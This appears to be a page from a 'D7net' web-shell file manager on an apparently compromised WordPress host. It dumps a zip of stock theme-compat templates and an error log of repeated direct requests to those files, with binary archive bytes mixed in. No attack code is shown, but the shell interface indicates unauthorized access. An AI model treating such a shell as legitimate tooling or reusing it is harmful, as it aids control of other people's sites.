D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
everqlsh
/
www
/
wp-admin
/
user
/
577040
/
Filename :
theme-compat.zip
back
Copy
PK 4}\ĽW9� � embed-404.phpnu �[��� <?php /** * Contains the post embed content template part * * When a post is embedded in an iframe, this file is used to create the content template part * output if the active theme does not include an embed-404.php template. * * @package WordPress * @subpackage Theme_Compat * @since 4.5.0 */ ?> <div class="wp-embed"> <p class="wp-embed-heading"><?php _e( 'Oops! That embed cannot be found.' ); ?></p> <div class="wp-embed-excerpt"> <p> <?php printf( /* translators: %s: A link to the embedded site. */ __( 'It looks like nothing was found at this location. Maybe try visiting %s directly?' ), '<strong><a href="' . esc_url( home_url() ) . '">' . esc_html( get_bloginfo( 'name' ) ) . '</a></strong>' ); ?> </p> </div> <?php /** This filter is documented in wp-includes/theme-compat/embed-content.php */ do_action( 'embed_content' ); ?> <div class="wp-embed-footer"> <?php the_embed_site_title(); ?> </div> </div> PK 4}\d{a/� � sidebar.phpnu �[��� <?php /** * @package WordPress * @subpackage Theme_Compat * @deprecated 3.0.0 * * This file is here for backward compatibility with old themes and will be removed in a future version. */ _deprecated_file( /* translators: %s: Template name. */ sprintf( __( 'Theme without %s' ), basename( __FILE__ ) ), '3.0.0', null, /* translators: %s: Template name. */ sprintf( __( 'Please include a %s template in your theme.' ), basename( __FILE__ ) ) ); ?> <div id="sidebar" role="complementary"> <ul> <?php /* Widgetized sidebar, if you have the plugin installed. */ if ( ! function_exists( 'dynamic_sidebar' ) || ! dynamic_sidebar() ) : ?> <li> <?php get_search_form(); ?> </li> <!-- Author information is disabled per default. Uncomment and fill in your details if you want to use it. <li><h2><?php _e( 'Author' ); ?></h2> <p>A little something about you, the author. Nothing lengthy, just an overview.</p> </li> --> <?php if ( is_404() || is_category() || is_day() || is_month() || is_year() || is_search() || is_paged() ) : ?> <li> <?php if ( is_404() ) : /* If this is a 404 page */ ?> <?php elseif ( is_category() ) : /* If this is a category archive */ ?> <p> <?php printf( /* translators: %s: Category name. */ __( 'You are currently browsing the archives for the %s category.' ), single_cat_title( '', false ) ); ?> </p> <?php elseif ( is_day() ) : /* If this is a daily archive */ ?> <p> <?php printf( /* translators: 1: Site link, 2: Archive date. */ __( 'You are currently browsing the %1$s blog archives for the day %2$s.' ), sprintf( '<a href="%1$s/">%2$s</a>', get_bloginfo( 'url' ), get_bloginfo( 'name' ) ), /* translators: Daily archives date format. See https://www.php.net/manual/datetime.format.php */ get_the_time( __( 'l, F jS, Y' ) ) ); ?> </p> <?php elseif ( is_month() ) : /* If this is a monthly archive */ ?> <p> <?php printf( /* translators: 1: Site link, 2: Archive month. */ __( 'You are currently browsing the %1$s blog archives for %2$s.' ), sprintf( '<a href="%1$s/">%2$s</a>', get_bloginfo( 'url' ), get_bloginfo( 'name' ) ), /* translators: Monthly archives date format. See https://www.php.net/manual/datetime.format.php */ get_the_time( __( 'F, Y' ) ) ); ?> </p> <?php elseif ( is_year() ) : /* If this is a yearly archive */ ?> <p> <?php printf( /* translators: 1: Site link, 2: Archive year. */ __( 'You are currently browsing the %1$s blog archives for the year %2$s.' ), sprintf( '<a href="%1$s/">%2$s</a>', get_bloginfo( 'url' ), get_bloginfo( 'name' ) ), get_the_time( 'Y' ) ); ?> </p> <?php elseif ( is_search() ) : /* If this is a search result */ ?> <p> <?php printf( /* translators: 1: Site link, 2: Search query. */ __( 'You have searched the %1$s blog archives for <strong>‘%2$s’</strong>. If you are unable to find anything in these search results, you can try one of these links.' ), sprintf( '<a href="%1$s/">%2$s</a>', get_bloginfo( 'url' ), get_bloginfo( 'name' ) ), esc_html( get_search_query() ) ); ?> </p> <?php elseif ( isset( $_GET['paged'] ) && ! empty( $_GET['paged'] ) ) : /* If this set is paginated */ ?> <p> <?php printf( /* translators: %s: Site link. */ __( 'You are currently browsing the %s blog archives.' ), sprintf( '<a href="%1$s/">%2$s</a>', get_bloginfo( 'url' ), get_bloginfo( 'name' ) ) ); ?> </p> <?php endif; ?> </li> <?php endif; ?> </ul> <ul role="navigation"> <?php wp_list_pages( 'title_li=<h2>' . __( 'Pages' ) . '</h2>' ); ?> <li><h2><?php _e( 'Archives' ); ?></h2> <ul> <?php wp_get_archives( array( 'type' => 'monthly' ) ); ?> </ul> </li> <?php wp_list_categories( array( 'show_count' => 1, 'title_li' => '<h2>' . __( 'Categories' ) . '</h2>', ) ); ?> </ul> <ul> <?php if ( is_home() || is_page() ) { /* If this is the frontpage */ ?> <?php wp_list_bookmarks(); ?> <li><h2><?php _e( 'Meta' ); ?></h2> <ul> <?php wp_register(); ?> <li><?php wp_loginout(); ?></li> <?php wp_meta(); ?> </ul> </li> <?php } ?> <?php endif; /* ! dynamic_sidebar() */ ?> </ul> </div> PK 5}\N�w�d �d error_lognu �[��� [24-Mar-2026 16:35:19 UTC] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php on line 19 [24-Mar-2026 16:37:33 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php on line 9 [24-Mar-2026 16:43:47 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php on line 14 [24-Mar-2026 18:21:57 UTC] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php on line 13 [24-Mar-2026 18:21:57 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php on line 9 [24-Mar-2026 18:23:49 UTC] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php on line 18 [24-Mar-2026 18:32:21 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php on line 9 [24-Mar-2026 18:32:26 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php on line 13 [24-Mar-2026 18:32:36 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header.php on line 9 [24-Mar-2026 22:23:04 UTC] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php on line 13 [24-Mar-2026 22:26:07 UTC] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php on line 18 [24-Mar-2026 22:28:02 UTC] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php on line 19 [24-Mar-2026 22:29:08 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php on line 14 [24-Mar-2026 22:30:12 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header.php on line 9 [24-Mar-2026 22:31:12 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php on line 13 [24-Mar-2026 22:32:16 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php on line 9 [24-Mar-2026 22:39:14 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php on line 9 [25-Mar-2026 02:00:41 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php on line 9 [25-Mar-2026 05:35:13 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php on line 9 [25-Mar-2026 05:35:15 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php on line 14 [25-Mar-2026 05:35:16 UTC] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php on line 13 [25-Mar-2026 05:35:18 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php on line 13 [25-Mar-2026 05:35:21 UTC] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php on line 18 [25-Mar-2026 05:35:23 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php on line 9 [25-Mar-2026 05:35:25 UTC] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php on line 19 [25-Mar-2026 05:35:26 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header.php on line 9 [25-Mar-2026 05:35:28 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php on line 9 [25-Mar-2026 08:03:56 UTC] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php on line 13 [25-Mar-2026 08:03:59 UTC] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php on line 18 [25-Mar-2026 08:04:06 UTC] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php on line 19 [25-Mar-2026 08:04:28 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php on line 14 [25-Mar-2026 08:05:33 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php on line 13 [25-Mar-2026 08:06:36 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header.php on line 9 [25-Mar-2026 08:07:38 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php on line 9 [25-Mar-2026 08:08:40 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php on line 9 [25-Mar-2026 08:09:44 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php on line 9 [25-Mar-2026 21:20:54 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php on line 9 [25-Mar-2026 21:20:55 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php on line 14 [25-Mar-2026 21:20:57 UTC] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php on line 13 [25-Mar-2026 21:20:59 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php on line 13 [25-Mar-2026 21:21:03 UTC] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php on line 18 [25-Mar-2026 21:21:04 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php on line 9 [25-Mar-2026 21:21:06 UTC] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php on line 19 [25-Mar-2026 21:21:08 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header.php on line 9 [25-Mar-2026 21:21:09 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php on line 9 [25-Mar-2026 21:23:23 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php on line 9 [25-Mar-2026 21:23:25 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php on line 14 [25-Mar-2026 21:23:26 UTC] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php on line 13 [25-Mar-2026 21:23:28 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php on line 13 [25-Mar-2026 21:23:31 UTC] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php on line 18 [25-Mar-2026 21:23:33 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php on line 9 [25-Mar-2026 21:23:35 UTC] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php on line 19 [25-Mar-2026 21:23:36 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header.php on line 9 [25-Mar-2026 21:23:38 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php on line 9 [26-Mar-2026 08:17:11 UTC] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php on line 13 [26-Mar-2026 08:20:55 UTC] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php on line 18 [26-Mar-2026 08:21:40 UTC] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php on line 19 [26-Mar-2026 08:44:36 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php on line 14 [26-Mar-2026 08:45:42 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php on line 13 [26-Mar-2026 08:50:16 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php on line 9 [26-Mar-2026 08:50:59 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header.php on line 9 [26-Mar-2026 08:52:03 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php on line 9 [26-Mar-2026 09:05:03 UTC] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php on line 19 [26-Mar-2026 09:12:10 UTC] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php on line 13 [26-Mar-2026 09:12:15 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php on line 9 [26-Mar-2026 09:14:00 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php on line 9 [26-Mar-2026 09:15:57 UTC] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php on line 18 [26-Mar-2026 09:43:03 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header.php on line 9 [26-Mar-2026 10:41:08 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php on line 9 [26-Mar-2026 10:41:54 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php on line 13 [26-Mar-2026 10:42:34 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php on line 14 [26-Mar-2026 12:48:22 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php on line 9 [26-Mar-2026 19:06:12 UTC] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php on line 13 [26-Mar-2026 19:06:14 UTC] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php on line 18 [26-Mar-2026 19:06:22 UTC] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php on line 19 [26-Mar-2026 19:06:47 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php on line 14 [26-Mar-2026 19:07:48 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php on line 13 [26-Mar-2026 19:08:49 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php on line 9 [26-Mar-2026 19:09:55 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header.php on line 9 [26-Mar-2026 19:11:01 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php on line 9 [26-Mar-2026 19:12:02 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php on line 9 [28-Mar-2026 09:26:25 UTC] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed.php on line 13 [28-Mar-2026 09:28:29 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/sidebar.php on line 9 [28-Mar-2026 09:29:48 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer.php on line 9 [28-Mar-2026 09:29:51 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-404.php on line 14 [28-Mar-2026 09:37:52 UTC] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/footer-embed.php on line 18 [28-Mar-2026 09:37:52 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/comments.php on line 9 [28-Mar-2026 09:38:23 UTC] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header-embed.php on line 19 [28-Mar-2026 11:14:46 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/everqlsh/public_html/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/header.php on line 9 [28-Mar-2026 11:15:09 UTC] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/theme-compat/embed-content.php on line 13 PK 5}\��� � footer-embed.phpnu �[��� <?php /** * Contains the post embed footer template * * When a post is embedded in an iframe, this file is used to create the footer output * if the active theme does not include a footer-embed.php template. * * @package WordPress * @subpackage Theme_Compat * @since 4.5.0 */ /** * Prints scripts or data before the closing body tag in the embed template. * * @since 4.4.0 */ do_action( 'embed_footer' ); ?> </body> </html> PK 6}\Us�Ѿ � header-embed.phpnu �[��� <?php /** * Contains the post embed header template * * When a post is embedded in an iframe, this file is used to create the header output * if the active theme does not include a header-embed.php template. * * @package WordPress * @subpackage Theme_Compat * @since 4.5.0 */ if ( ! headers_sent() ) { header( 'X-WP-embed: true' ); } ?> <!DOCTYPE html> <html <?php language_attributes(); ?> class="no-js"> <head> <title><?php echo wp_get_document_title(); ?></title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <?php 